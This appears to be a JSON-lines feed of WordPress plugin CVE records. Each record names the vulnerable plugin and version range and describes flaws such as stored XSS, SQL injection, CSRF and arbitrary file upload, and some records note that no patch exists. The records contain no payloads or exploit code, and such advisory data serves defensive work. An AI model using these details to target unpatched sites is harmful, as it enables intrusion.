{"CVE_ID":"CVE-2021-4445","slug":"premium-addons-for-elementor","versionImpact":"4.5.1","description":"The Premium Addons for Elementor plugin for WordPress is vulnerable to Arbitrary Option Updates in versions up to, and including, 4.5.1. This is due to missing capability and nonce checks in the pa_dismiss_admin_notice AJAX action. This makes it possible for authenticated subscriber+ attackers to change arbitrary options with a restricted value of 1 on vulnerable WordPress sites.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cffb26bc-3d3f-4593-bb36-d2abcd67861e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cffb26bc-3d3f-4593-bb36-d2abcd67861e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/ithemes.com\\\/blog\\\/wordpress-vulnerability-report-september-2021-part-2\\\/#ib-toc-anchor-2\",\"name\":\"https:\\\/\\\/ithemes.com\\\/blog\\\/wordpress-vulnerability-report-september-2021-part-2\\\/#ib-toc-anchor-2\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2e5b3608-1dfc-468f-b3ae-12ce7c25ee6c\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2e5b3608-1dfc-468f-b3ae-12ce7c25ee6c\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/premium-addons-for-elementor\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/premium-addons-for-elementor\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2590819%40premium-addons-for-elementor&new=2590819%40premium-addons-for-elementor&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2590819%40premium-addons-for-elementor&new=2590819%40premium-addons-for-elementor&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9934","slug":"wp-imagezoom","versionImpact":"1.1.0","description":"The Wp-ImageZoom WordPress plugin through 1.1.0 does not sanitise and escape some parameters before outputting them back in a page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/53e640a7-833e-40de-93d4-acea28aff5a5\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/53e640a7-833e-40de-93d4-acea28aff5a5\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11227","slug":"memberlite-shortcodes","versionImpact":"1.3.9","description":"The Memberlite Shortcodes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's memberlite_accordion shortcode in all versions up to, and including, 1.3.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/memberlite-shortcodes\\\/tags\\\/1.3.9\\\/shortcodes\\\/accordion.php#L14\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/memberlite-shortcodes\\\/tags\\\/1.3.9\\\/shortcodes\\\/accordion.php#L14\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3195143\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3195143\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/memberlite-shortcodes\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/memberlite-shortcodes\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1c98e8f4-49b4-4d1e-8e11-e38b676d4af0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1c98e8f4-49b4-4d1e-8e11-e38b676d4af0?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11945","slug":"email-reminders","versionImpact":"2.0.4","description":"The Email Reminders plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018id\u2019 parameter in all versions up to, and including, 2.0.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/email-reminders\\\/trunk\\\/includes\\\/page-rules\\\/rules_shortcodes.php#L70\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/email-reminders\\\/trunk\\\/includes\\\/page-rules\\\/rules_shortcodes.php#L70\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3202124\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3202124\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/email-reminders\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/email-reminders\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a0adfd13-a9f1-4bec-96ec-6a51cd08e4ea?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a0adfd13-a9f1-4bec-96ec-6a51cd08e4ea?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12493","slug":"files-download-delay","versionImpact":"1.0.9","description":"The Files Download Delay plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'fddwrap' shortcode in all versions up to, and including, 1.0.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/files-download-delay\\\/trunk\\\/post.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/files-download-delay\\\/trunk\\\/post.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/files-download-delay\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/files-download-delay\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/217f3595-3c35-46c1-a02c-e8829732a719?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/217f3595-3c35-46c1-a02c-e8829732a719?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-23428","slug":"qmean","versionImpact":"2.0","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in NotFound QMean \u2013 WordPress Did You Mean allows Reflected XSS. This issue affects QMean \u2013 WordPress Did You Mean: from n\/a through 2.0.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/qmean\\\/vulnerability\\\/wordpress-qmean-plugin-2-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/qmean\\\/vulnerability\\\/wordpress-qmean-plugin-2-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1338","slug":"unusedcss","versionImpact":"1.7.1","description":"The RapidLoad Power-Up for Autoptimize plugin for WordPress is vulnerable to unauthorized cache modification due to a missing capability check on the attach_rule function in versions up to, and including, 1.7.1. This makes it possible for authenticated attackers with subscriber-level access to modify cache rules.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1bb55b22-a0d0-424f-8e4f-57d3f239c149\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1bb55b22-a0d0-424f-8e4f-57d3f239c149\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2877726\\\/unusedcss\\\/trunk\\\/includes\\\/modules\\\/unused-css\\\/UnusedCSS_Admin.php?contextall=1&old=2847136&old_path=%2Funusedcss%2Ftrunk%2Fincludes%2Fmodules%2Funused-css%2FUnusedCSS_Admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2877726\\\/unusedcss\\\/trunk\\\/includes\\\/modules\\\/unused-css\\\/UnusedCSS_Admin.php?contextall=1&old=2847136&old_path=%2Funusedcss%2Ftrunk%2Fincludes%2Fmodules%2Funused-css%2FUnusedCSS_Admin.php\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0536","slug":"wp-d3","versionImpact":"2.4.1","description":"The Wp-D3 WordPress plugin through 2.4.1 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7b19d792-8083-4c0c-a45e-a99c1f5f0df0\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7b19d792-8083-4c0c-a45e-a99c1f5f0df0\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36705","slug":"angwp","versionImpact":"1.5.5","description":"The Adning Advertising plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the _ning_upload_image function in versions up to, and including, 1.5.5. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected sites server which may make remote code execution possible.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4a263b74-e9ae-4fd2-be9b-9b8e9eee5982?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4a263b74-e9ae-4fd2-be9b-9b8e9eee5982?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/blog\\\/2020\\\/07\\\/critical-vulnerabilities-patched-in-adning-advertising-plugin\\\/\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/blog\\\/2020\\\/07\\\/critical-vulnerabilities-patched-in-adning-advertising-plugin\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/wp-pro-advertising-system-all-in-one-ad-manager\\\/269693\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/wp-pro-advertising-system-all-in-one-ad-manager\\\/269693\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/critical-vulnerability-in-adning-advertising-plugin-actively-exploited-in-the-wild\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/critical-vulnerability-in-adning-advertising-plugin-actively-exploited-in-the-wild\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e9873fe3-fc06-4a52-aa32-6922cab7830c\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e9873fe3-fc06-4a52-aa32-6922cab7830c\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2079","slug":"buymeacoffee","versionImpact":"3.7","description":"The \"Buy Me a Coffee \u2013 Button and Widget Plugin\" plugin for WordPress is vulnerable to Cross-Site Request Forgery due to missing nonce validation on the recieve_post, bmc_disconnect, name_post, and widget_post functions in versions up to, and including, 3.7. This makes it possible for unauthenticated attackers to update the plugins settings, via a forged request granted the attacker can trick a site's administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2935565%40buymeacoffee&new=2935565%40buymeacoffee&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2935565%40buymeacoffee&new=2935565%40buymeacoffee&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/buymeacoffee\\\/trunk\\\/includes\\\/class-buy-me-a-coffee.php?rev=2319979#L162\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/buymeacoffee\\\/trunk\\\/includes\\\/class-buy-me-a-coffee.php?rev=2319979#L162\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6309258e-e4fc-4edf-a771-2d82a9a85a5c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6309258e-e4fc-4edf-a771-2d82a9a85a5c?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/buymeacoffee\\\/trunk\\\/admin\\\/class-buy-me-a-coffee-admin.php?rev=2816542\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/buymeacoffee\\\/trunk\\\/admin\\\/class-buy-me-a-coffee-admin.php?rev=2816542\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4890","slug":"jquery-vertical-accordion-menu","versionImpact":"3.1.2","description":"The JQuery Accordion Menu Widget for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'dcwp-jquery-accordion' shortcode in versions up to, and including, 3.1.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b0cf3015-cdc9-4ac9-82f3-e9b4d1203e22?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b0cf3015-cdc9-4ac9-82f3-e9b4d1203e22?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jquery-vertical-accordion-menu\\\/tags\\\/3.1.2\\\/dcwp_jquery_accordion.php#L112\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jquery-vertical-accordion-menu\\\/tags\\\/3.1.2\\\/dcwp_jquery_accordion.php#L112\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jquery-vertical-accordion-menu\\\/tags\\\/3.1.2\\\/dcwp_jquery_accordion.php#L94\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jquery-vertical-accordion-menu\\\/tags\\\/3.1.2\\\/dcwp_jquery_accordion.php#L94\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6827","slug":"essential-real-estate","versionImpact":"4.3.5","description":"The Essential Real Estate plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation on the 'ajaxUploadFonts' function in versions up to, and including, 4.3.5. This makes it possible for authenticated attackers with subscriber-level capabilities or above, to upload arbitrary files on the affected site's server which may make remote code execution possible.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8bb2ce22-077b-41dd-a2ff-cc1db9d20d38?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8bb2ce22-077b-41dd-a2ff-cc1db9d20d38?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-real-estate\\\/tags\\\/4.3.5\\\/lib\\\/smart-framework\\\/core\\\/fonts\\\/fonts.class.php#L524\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-real-estate\\\/tags\\\/4.3.5\\\/lib\\\/smart-framework\\\/core\\\/fonts\\\/fonts.class.php#L524\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3009780\\\/essential-real-estate\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3009780\\\/essential-real-estate\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2655","slug":"contact-form-maker","versionImpact":"1.13.23","description":"The Contact Form by WD WordPress plugin through 1.13.23 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b3f2d38f-8eeb-45e9-bb58-2957e416e1cd\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b3f2d38f-8eeb-45e9-bb58-2957e416e1cd\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1362","slug":"colibri-page-builder","versionImpact":"1.0.253","description":"The Colibri Page Builder plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.253. This is due to missing or incorrect nonce validation on the cp_shortcode_refresh() function. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a5e7a994-c489-4aea-a9bb-898bc92cae4e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a5e7a994-c489-4aea-a9bb-898bc92cae4e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3039597\\\/colibri-page-builder\\\/trunk\\\/src\\\/PageBuilder.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3039597\\\/colibri-page-builder\\\/trunk\\\/src\\\/PageBuilder.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1854","slug":"essential-blocks","versionImpact":"4.5.1","description":"The Essential Blocks \u2013 Page Builder Gutenberg Blocks, Patterns & Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the blockId parameter in all versions up to, and including, 4.5.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/86364b6f-dec8-48d8-9d2d-de1ee4901872?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/86364b6f-dec8-48d8-9d2d-de1ee4901872?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3041859%40essential-blocks%2Ftrunk&old=3036273%40essential-blocks%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3041859%40essential-blocks%2Ftrunk&old=3036273%40essential-blocks%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0756","slug":"insert-or-embed-articulate-content-into-wordpress","versionImpact":"4.3000000023","description":"The Insert or Embed Articulate Content into WordPress plugin through 4.3000000023 lacks validation of URLs when adding iframes, allowing attackers to inject an iFrame in the page and thus load arbitrary content from any page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9130a42d-fca3-4f9c-ab97-d5e0a7a5cef2\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9130a42d-fca3-4f9c-ab97-d5e0a7a5cef2\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11199","slug":"rescue-shortcodes","versionImpact":"2.9","description":"The Rescue Shortcodes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's rescue_progressbar shortcode in all versions up to, and including, 2.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rescue-shortcodes\\\/tags\\\/2.9\\\/includes\\\/shortcode-functions.php#L379\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rescue-shortcodes\\\/tags\\\/2.9\\\/includes\\\/shortcode-functions.php#L379\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3193428\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3193428\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/rescue-shortcodes\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/rescue-shortcodes\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a188c615-513b-4d65-8351-d70848696297?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a188c615-513b-4d65-8351-d70848696297?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11940","slug":"property-hive-mortgage-calculator","versionImpact":"1.0.6","description":"The Property Hive Mortgage Calculator plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018price\u2019 parameter in all versions up to, and including, 1.0.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/property-hive-mortgage-calculator\\\/tags\\\/1.0.6\\\/propertyhive-mortgage-calculator.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/property-hive-mortgage-calculator\\\/tags\\\/1.0.6\\\/propertyhive-mortgage-calculator.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/property-hive-mortgage-calculator\\\/tags\\\/1.0.6\\\/templates\\\/mortgage-calculator.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/property-hive-mortgage-calculator\\\/tags\\\/1.0.6\\\/templates\\\/mortgage-calculator.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3202219\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3202219\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/property-hive-mortgage-calculator\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/property-hive-mortgage-calculator\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0f01f69e-0ff8-4771-9bf5-53ef78438cc2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0f01f69e-0ff8-4771-9bf5-53ef78438cc2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12491","slug":"simply-rets","versionImpact":"2.11.2","description":"The SimplyRETS Real Estate IDX plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'sr_search_form' shortcode in all versions up to, and including, 2.11.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/simply-rets\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/simply-rets\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aa5c2d05-f6cb-4f97-b174-653ad3577b02?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aa5c2d05-f6cb-4f97-b174-653ad3577b02?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0821","slug":"bit-assist","versionImpact":"1.5.2","description":"Bit Assist plugin for WordPress is vulnerable to time-based SQL Injection via the \u2018id\u2019 parameter in all versions up to, and including, 1.5.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bit-assist\\\/tags\\\/1.5.2\\\/backend\\\/app\\\/HTTP\\\/Controllers\\\/WidgetChannelController.php#L89\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bit-assist\\\/tags\\\/1.5.2\\\/backend\\\/app\\\/HTTP\\\/Controllers\\\/WidgetChannelController.php#L89\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3239816\\\/#file5\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3239816\\\/#file5\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/bit-assist\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/bit-assist\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b64fc9d8-ea02-49e7-add1-8d83f0f41431?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b64fc9d8-ea02-49e7-add1-8d83f0f41431?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1337","slug":"unusedcss","versionImpact":"1.7.1","description":"The RapidLoad Power-Up for Autoptimize plugin for WordPress is vulnerable to unauthorized data loss due to a missing capability check on the clear_uucss_logs function in versions up to, and including, 1.7.1. This makes it possible for authenticated attackers with subscriber-level access to delete plugin log 